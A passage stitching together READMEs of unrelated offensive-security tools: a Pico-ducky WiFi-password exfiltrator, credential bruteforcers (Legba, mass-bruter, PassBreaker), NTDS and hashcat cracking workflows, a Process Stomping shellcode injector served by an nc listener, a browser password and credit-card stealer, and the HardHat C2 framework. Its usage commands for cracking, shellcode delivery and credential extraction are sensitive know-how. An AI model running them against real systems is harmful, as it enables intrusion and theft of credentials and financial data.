will match any text after the keyword. This allows the payload to match the values after SSID and psk (pre-shared key) keywords.
For more information about NetworkManager here is some useful links:
Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt
file.
WiFi-password-stealer/resources/wifi_pass.txt
Lines 1 to 5 in f5b3b11
Wireless_Network_Name Password | |
--------------------- -------- | |
WLAN1 pass1 | |
WLAN2 pass2 | |
WLAN3 pass3 |
One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees it as a USB keyboard. This isn't a default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND
) and pin 20 (GPIO15
). For more details visit this link.
๏ก Tip:
- Upload your payload to RPi Pico before you connect the pins.
- Don't solder the pins because you will probably want to change/update the payload at some point.
When creating a functioning payload file, you can use the writer.py
script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, a name of the OS (windows or linux) and the name of the payload file (e.q. payload1.dd). Below you can find an example how to run the writer script when creating a Windows payload.
python3 writer.py windows payload1.dd
This pico-ducky currently works only on Windows OS.
This attack requires physical access to an unlocked device in order to be successfully deployed.
The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admins password for the Linux machine.
Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.
Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.
The pico-ducky device isn't really stealthy, actually it's quite the opposite, it's really bulky especially if you solder the pins.
Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.
If the Caps Lock
is ON, some of the payload code will not be executed and the exploit will fail.
If the computer has a non-English Environment set, this exploit won't be successful.
Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.
Caps Lock
bug.sudo
.Legba
is a multiprotocol credentials bruteforcer / password sprayer and enumerator built with Rust and the Tokio asynchronous runtime in order to achieve better performances and stability while consuming less resources than similar tools (see the benchmark below).
For the building instructions, usage and the complete list of options check the project Wiki.
AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM and Solace), Cassandra/ScyllaDB, DNS subdomain enumeration, FTP, HTTP (basic authentication, NTLMv1, NTLMv2, multipart form, custom requests with CSRF support, files/folders enumeration, virtual host enumeration), IMAP, Kerberos pre-authentication and user enumeration, LDAP, MongoDB, MQTT, Microsoft SQL, MySQL, Oracle, PostgreSQL, POP3, RDP, Redis, SSH / SFTP, SMTP, STOMP (ActiveMQ, RabbitMQ, HornetQ and OpenMQ), TCP port scanning, Telnet, VNC.
Here's a benchmark of legba
versus thc-hydra
running some common plugins, both targeting the same test servers on localhost. The benchmark has been executed on a macOS laptop with an M1 Max CPU, using a wordlist of 1000 passwords with the correct one being on the last line. Legba was compiled in release mode, Hydra compiled and installed via brew formula.
Far from being an exhaustive benchmark (some legba features are simply not supported by hydra, such as CSRF token grabbing), this table still gives a clear idea of how using an asynchronous runtime can drastically improve performances.
Test Name | Hydra Tasks | Hydra Time | Legba Tasks | Legba Time |
---|---|---|---|---|
HTTP basic auth | 16 | 7.100s | 10 | 1.560s (๏ 4.5x faster) |
HTTP POST login (wordpress) | 16 | 14.854s | 10 | 5.045s (๏ 2.9x faster) |
SSH | 16 | 7m29.85s * | 10 | 8.150s (๏ 55.1x faster) |
MySQL | 4 ** | 9.819s | 4 ** | 2.542s (๏ 3.8x faster) |
Microsoft SQL | 16 | 7.609s | 10 | 4.789s (๏ 1.5x faster) |
* While this result would suggest a default delay between connection attempts used by Hydra. I've tried to study the source code to find such delay but to my knowledge there's none. For some reason it's simply very slow.
** For MySQL hydra automatically reduces the amount of tasks to 4, therefore legba's concurrency level has been adjusted to 4 as well.
Legba is released under the GPL 3 license. To see the licenses of the project dependencies, install cargo license with cargo install cargo-license
and then run cargo license
.
KnowsMore officially supports Python 3.8+.
knowsmore --stats
This command will produce several statistics about the passwords like the output bellow
KnowsMore v0.1.4 by Helvio Junior
Active Directory, BloodHound, NTDS hashes and Password Cracks correlation tool
https://github.com/helviojunior/knowsmore
[+] Startup parameters
command line: knowsmore --stats
module: stats
database file: knowsmore.db
[+] start time 2023-01-11 03:59:20
[?] General Statistics
+-------+----------------+-------+
| top | description | qty |
|-------+----------------+-------|
| 1 | Total Users | 95369 |
| 2 | Unique Hashes | 74299 |
| 3 | Cracked Hashes | 23177 |
| 4 | Cracked Users | 35078 |
+-------+----------------+-------+
[?] General Top 10 passwords
+-------+-------------+-------+
| top | password | qty |
|-------+-------------+-------|
| 1 | password | 1111 |
| 2 | 123456 | 824 |
| 3 | 123456789 | 815 |
| 4 | guest | 553 |
| 5 | qwerty | 329 |
| 6 | 12345678 | 277 |
| 7 | 111111 | 268 |
| 8 | 12345 | 202 |
| 9 | secret | 170 |
| 10 | sec4us | 165 |
+-------+-------------+-------+
[?] Top 10 weak passwords by company name similarity
+-------+--------------+---------+----------------------+-------+
| top | password | score | company_similarity | qty |
|-------+--------------+---------+----------------------+-------|
| 1 | company123 | 7024 | 80 | 1111 |
| 2 | Company123 | 5209 | 80 | 824 |
| 3 | company | 3674 | 100 | 553 |
| 4 | Company@10 | 2080 | 80 | 329 |
| 5 | company10 | 1722 | 86 | 268 |
| 6 | Company@2022 | 1242 | 71 | 202 |
| 7 | Company@2024 | 1015 | 71 | 165 |
| 8 | Company2022 | 978 | 75 | 157 |
| 9 | Company10 | 745 | 86 | 116 |
| 10 | Company21 | 707 | 86 | 110 |
+-------+--------------+---------+----------------------+-------+
pip3 install --upgrade knowsmore
Note: If you face problem with dependency version Check the Virtual ENV file
There is no an obligation order to import data, but to get better correlation data we suggest the following execution flow:
All data are stored in a SQLite Database
knowsmore --create-db
We can import all full BloodHound files into KnowsMore, correlate data, and sync it to Neo4J BloodHound Database. So you can use only KnowsMore to import JSON files directly into Neo4j database instead of use extremely slow BloodHound User Interface
# Bloodhound ZIP File
knowsmore --bloodhound --import-data ~/Desktop/client.zip
# Bloodhound JSON File
knowsmore --bloodhound --import-data ~/Desktop/20220912105336_users.json
Note: The KnowsMore is capable to import BloodHound ZIP File and JSON files, but we recommend to use ZIP file, because the KnowsMore will automatically order the files to better data correlation.
# Bloodhound ZIP File
knowsmore --bloodhound --sync 10.10.10.10:7687 -d neo4j -u neo4j -p 12345678
Note: The KnowsMore implementation of bloodhount-importer was inpired from Fox-It BloodHound Import implementation. We implemented several changes to save all data in KnowsMore SQLite database and after that do an incremental sync to Neo4J database. With this strategy we have several benefits such as at least 10x faster them original BloodHound User interface.
Note: Import hashes and clear-text passwords directly from NTDS.dit and SYSTEM registry
knowsmore --secrets-dump -target LOCAL -ntds ~/Desktop/ntds.dit -system ~/Desktop/SYSTEM
Note: First use the secretsdump to extract ntds hashes with the command bellow
secretsdump.py -ntds ntds.dit -system system.reg -hashes lmhash:ntlmhash LOCAL -outputfile ~/Desktop/client_name
After that import
knowsmore --ntlm-hash --import-ntds ~/Desktop/client_name.ntds
knowsmore --word-list -o "~/Desktop/Wordlist/my_custom_wordlist.txt" --batch --name company_name
First extract all hashes to a txt file
# Extract NTLM hashes to file
nowsmore --ntlm-hash --export-hashes "~/Desktop/ntlm_hash.txt"
# Or, extract NTLM hashes from NTDS file
cat ~/Desktop/client_name.ntds | cut -d ':' -f4 > ntlm_hashes.txt
In order to crack the hashes, I usually use hashcat
with the command bellow
# Wordlist attack
hashcat -m 1000 -a 0 -O -o "~/Desktop/cracked.txt" --remove "~/Desktop/ntlm_hash.txt" "~/Desktop/Wordlist/*"
# Mask attack
hashcat -m 1000 -a 3 -O --increment --increment-min 4 -o "~/Desktop/cracked.txt" --remove "~/Desktop/ntlm_hash.txt" ?a?a?a?a?a?a?a?a
knowsmore --ntlm-hash --company clientCompanyName --import-cracked ~/Desktop/cracked.txt
Note: Change clientCompanyName to name of your company
As the passwords and his hashes are extremely sensitive data, there is a module to replace the clear text passwords and respective hashes.
Note: This command will keep all generated statistics and imported user data.
knowsmore --wipe
During the assessment you can find (in a several ways) users password, so you can add this to the Knowsmore database
knowsmore --user-pass --username administrator --password Sec4US@2023
# or adding the company name
knowsmore --user-pass --username administrator --password Sec4US@2023 --company sec4us
Integrate all credentials cracked to Neo4j Bloodhound database
knowsmore --bloodhound --mark-owned 10.10.10.10 -d neo4j -u neo4j -p 123456
To remote connection make sure that Neo4j database server is accepting remote connection. Change the line bellow at the config file /etc/neo4j/neo4j.conf and restart the service.
server.bolt.listen_address=0.0.0.0:7687
A variation of ProcessOverwriting to execute shellcode on an executable's section
For a more detailed explanation you can read my blog post
Process Stomping, is a variation of hasherezadeโs Process Overwriting and it has the advantage of writing a shellcode payload on a targeted section instead of writing a whole PE payload over the hosting process address space.
These are the main steps of the ProcessStomping technique:
As an example application of the technique, the PoC can be used with sRDI to load a beacon dll over an executable RWX section. The following picture describes the steps involved.
All information and content is provided for educational purposes only. Follow instructions at your own risk. Neither the author nor his employer are responsible for any direct or consequential damage or loss arising from any person or organization.
This work has been made possible because of the knowledge and tools shared by Aleksandra Doniec @hasherezade and Nick Landers.
Select your target process and modify global variables accordingly in ProcessStomping.cpp.
Compile the sRDI project making sure that the offset is enough to jump over your generated sRDI shellcode blob and then update the sRDI tools:
cd \sRDI-master
python .\lib\Python\EncodeBlobs.py .\
Generate a Reflective-Loaderless dll payload of your choice and then generate sRDI shellcode blob:
python .\lib\Python\ConvertToShellcode.py -b -f "changethedefault" .\noRLx86.dll
The shellcode blob can then be xored with a key-word and downloaded using a simple socket
python xor.py noRLx86.bin noRLx86_enc.bin Bangarang
Deliver the xored blob upon connection
nc -vv -l -k -p 8000 -w 30 < noRLx86_enc.bin
The sRDI blob will get erased after execution to remove unneeded artifacts.
To successfully execute this technique you should select the right target process and use a dll payload that doesn't come with a User Defined Reflective loader.
Process Stomping technique requires starting the target process in a suspended state, changing the thread's entry point, and then resuming the thread to execute the injected shellcode. These are operations that might be considered suspicious if performed in quick succession and could lead to increased scrutiny by some security solutions.
A bash script to retrieve user's .plist files on a macOS system and to convert the data inside it to a crackable hash format. (to use with John The Ripper or Hashcat)
Useful for CTFs/Pentesting/Red Teaming on macOS systems.
sudo
)sudo ./osx_password_cracker.sh OUTPUT_FILE /path/to/save/.plist
PassBreaker is a command-line password cracking tool developed in Python. It allows you to perform various password cracking techniques such as wordlist-based attacks and brute force attacks.ย
Clone the repository:
git clone https://github.com/HalilDeniz/PassBreaker.git
Install the required dependencies:
pip install -r requirements.txt
python passbreaker.py <password_hash> <wordlist_file> [--algorithm]
Replace <password_hash>
with the target password hash and <wordlist_file>
with the path to the wordlist file containing potential passwords.
--algorithm <algorithm>
: Specify the hash algorithm to use (e.g., md5, sha256, sha512).-s, --salt <salt>
: Specify a salt value to use.-p, --parallel
: Enable parallel processing for faster cracking.-c, --complexity
: Evaluate password complexity before cracking.-b, --brute-force
: Perform a brute force attack.--min-length <min_length>
: Set the minimum password length for brute force attacks.--max-length <max_length>
: Set the maximum password length for brute force attacks.--character-set <character_set>
: Set the character set to use for brute force attacks.Elbette! ฤฐลte ฤฐngilizce olarak yazฤฑlmฤฑล baลlฤฑk ve kรผรงรผk bir bilgi ile daha fazla kullanฤฑm รถrneฤi:
python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5
This command attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the MD5 algorithm and a wordlist from the "passwords.txt" file.
python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 --brute-force --min-length 6 --max-length 8 --character-set abc123
This command performs a brute force attack to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" by trying all possible combinations of passwords with a length between 6 and 8 characters, using the character set "abc123".
python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha256 --complexity
This command evaluates the complexity of passwords in the "passwords.txt" file and attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the SHA-256 algorithm. It only tries passwords that meet the complexity requirements.
python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5 --salt mysalt123
This command uses a specific salt value ("mysalt123") for the password cracking process. Salt is used to enhance the security of passwords.
python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha512 --parallel
This command performs password cracking with parallel processing for faster cracking. It utilizes multiple processing cores, but it may consume more system resources.
These examples demonstrate different features and use cases of the "PassBreaker" password cracking tool. Users can customize the parameters based on their needs and goals.
This tool is intended for educational and ethical purposes only. Misuse of this tool for any malicious activities is strictly prohibited. The developers assume no liability and are not responsible for any misuse or damage caused by this tool.
Contributions are welcome! To contribute to PassBreaker, follow these steps:
If you have any questions, comments, or suggestions about PassBreaker, please feel free to contact me:
PassBreaker is released under the MIT License. See LICENSE for more information.
Mass bruteforce network protocols
Simple personal script to quickly mass bruteforce common services in a large scale of network.
It will check for default credentials on ftp, ssh, mysql, mssql...etc.
This was made for authorized red team penetration testing purpose only.
masscan
(faster than nmap) to find alive hosts with common ports from network segment.masscan
result.hydra
commands to automatically bruteforce supported network services on devices.Kali linux
or any preferred linux distributionPython 3.10+
# Clone the repo
git clone https://github.com/opabravo/mass-bruter
cd mass-bruter
# Install required tools for the script
apt update && apt install seclists masscan hydra
Private ip range :
10.0.0.0/8
,192.168.0.0/16
,172.16.0.0/12
Save masscan results under ./result/masscan/
, with the format masscan_<name>.<ext>
Ex: masscan_192.168.0.0-16.txt
Example command:
masscan -p 3306,1433,21,22,23,445,3389,5900,6379,27017,5432,5984,11211,9200,1521 172.16.0.0/12 | tee ./result/masscan/masscan_test.txt
Example Resume Command:
masscan --resume paused.conf | tee -a ./result/masscan/masscan_test.txt
Command Options
โโโ(rootใฟroot)-[~/mass-bruter]
โโ# python3 mass_bruteforce.py
Usage: [OPTIONS]
Mass Bruteforce Script
Options:
-q, --quick Quick mode (Only brute telnet, ssh, ftp , mysql,
mssql, postgres, oracle)
-a, --all Brute all services(Very Slow)
-s, --show Show result with successful login
-f, --file-path PATH The directory or file that contains masscan result
[default: ./result/masscan/]
--help Show this message and exit.
Quick Bruteforce Example:
python3 mass_bruteforce.py -q -f ~/masscan_script.txt
Fetch cracked credentials:
python3 mass_bruteforce.py -s
dpl4hydra
Any contributions are welcomed!
Nodesub is a command-line tool for finding subdomains in bug bounty programs. It supports various subdomain enumeration techniques and provides flexible options for customization.
To install Nodesub, use the following command:
npm install -g nodesub
NOTE:
~/.config/nodesub/config.ini
nodesub -h
This will display help for the tool. Here are all the switches it supports.
Enumerate subdomains for a single domain:
nodesub -u example.com
Enumerate subdomains for a list of domains from a file:
nodesub -l domains.txt
Perform subdomain enumeration using CIDR:
node nodesub.js -c 192.168.0.0/24 -o subdomains.txt
node nodesub.js -c CIDR.txt -o subdomains.txt
Perform subdomain enumeration using ASN:
node nodesub.js -a AS12345 -o subdomains.txt
node nodesub.js -a ASN.txt -o subdomains.txt
Enable recursive subdomain enumeration and output the results to a JSON file:
nodesub -u example.com -r -o output.json -f json
The tool provides various output formats for the results, including:
The output file contains the resolved subdomains, failed resolved subdomains, or all subdomains based on the options chosen.
This python program gets all the saved passwords, credit cards and bookmarks from chromium based browsers supports chromium 80 and above!
To install all the required modules use the following code:
pip install -r requirements.txt
โ Amigo
โ Torch
โ Kometa
โ Orbitum
โ Cent-browser
โ 7star
โ Sputnik
โ Vivaldi
โ Google-chrome-sxs
โ Google-chrome
โ Epic-privacy-browser
โ Microsoft-edge
โ Uran
โ Yandex
โ Brave
โ Iridium
pip install -r requirements.txt
Just run this chromium_based_browsers.py the code will create a folder based on the browser name and stores the saved passwords, credit cards and bookmarks in that folder.
HardHat is a multiplayer C# .NET-based command and control framework. Designed to aid in red team engagements and penetration testing. HardHat aims to improve the quality of life factors during engagements by providing an easy-to-use but still robust C2 framework.
It contains three primary components, an ASP.NET teamserver, a blazor .NET client, and C# based implants.
Alpha Release - 3/29/23 NOTE: HardHat is in Alpha release; it will have bugs, missing features, and unexpected things will happen. Thank you for trying it, and please report back any issues or missing features so they can be addressed.
Discord Join the community to talk about HardHat C2, Programming, Red teaming and general cyber security things The discord community is also a great way to request help, submit new features, stay up to date on the latest additions, and submit bugs.
documentation can be found at docs
To configure the team server's starting address (where clients will connect), edit the HardHatC2\TeamServer\Properties\LaunchSettings.json changing the "applicationUrl": "https://127.0.0.1:5000" to the desired location and port. start the teamserver with dotnet run from its top-level folder ../HrdHatC2/Teamserver/
Code contributions are welcome feel free to submit feature requests, pull requests or send me your ideas on discord.
Simple script to generate graphs and charts on hashcat (and john) potfile and ntds
git clone https://github.com/Orange-Cyberdefense/graphcat
cd graphcat
pip install .
$ graphcat.py -h
usage: graphcat.py [-h] -potfile hashcat.potfile -hashfile hashfile.txt [-john] [-format FORMAT] [-export-charts] [-output-dir OUTPUT_DIR] [-debug]
Password Cracking Graph Reporting
options:
-h, --help show this help message and exit
-potfile hashcat.potfile
Hashcat Potfile
-hashfile hashfile.txt
File containing hashes (one per line)
-john John potfile
-format FORMAT hashfile format (default 3): 1 for hash; 2 for username:hash; 3 for secretsdump (username:uid:lm:ntlm)
-export-charts Output also charts in png
-output-dir OUTPUT_DIR
Output directory
-debug Turn DEB UG output ON
Graphcat just need a potfile with -potfile
(default is hashcat, but you can use -john
to submit a john potfile) and a hashfile with -hashfile
. The hashfile should be in a specific format from the 3 availables formats with -format
flag. Default is Secretsdump.
The tool will generate a report with multiple password cracking charts. You can get charts in png with the -export-charts
flag.
$ graphcat.py -hashfile entreprise.local.ntds -potfile hashcat.pot
[-] Parsing potfile
[-] 164 entries in potfile
[-] Parsing hashfile
[-] 1600 entries in hashfile
[-] Generating graphs...
[-] Generating report...
[-] Report available at graphcat_1672941324.pdf
1: Only Hash
aad3b435b51404eeaad3b435b51404ee
aad3b435b51404eeaad3b435b51404ee
aad3b435b51404eeaad3b435b51404ee
2: Username + Hash
test1:aad3b435b51404eeaad3b435b51404ee
test2:aad3b435b51404eeaad3b435b51404ee
test3:aad3b435b51404eeaad3b435b51404ee
3: Secretsdump
waza.local\test1:4268:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee:::
waza.local\test2:4269:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee:::
waza.local\test3:4270:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee:::
If a hash occurs more than once in the hash file, it will be counted that many times.
Moreover, if you submit secretsdump with password history (-history
in secretsdump command), it will analyze similarity in password history